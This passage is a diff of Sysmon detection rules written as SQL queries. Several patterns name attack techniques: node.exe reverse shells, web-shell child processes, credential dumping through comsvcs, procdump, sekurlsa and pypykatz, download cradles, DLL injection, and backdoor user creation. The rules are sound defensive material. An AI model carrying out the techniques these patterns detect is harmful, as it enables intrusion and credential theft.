PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_node_abuse.yml" - }, - { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", - "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" - ], + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "status": "experimental", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_susp_download_office_domain.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "status": "test", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", - "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.005" + "attack.t1003.002" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_hktl_pypykatz.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", - "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", - "author": "frack113", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1555.004" + ], + "falsepositives": [ + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", - "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", - "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "status": "test", + 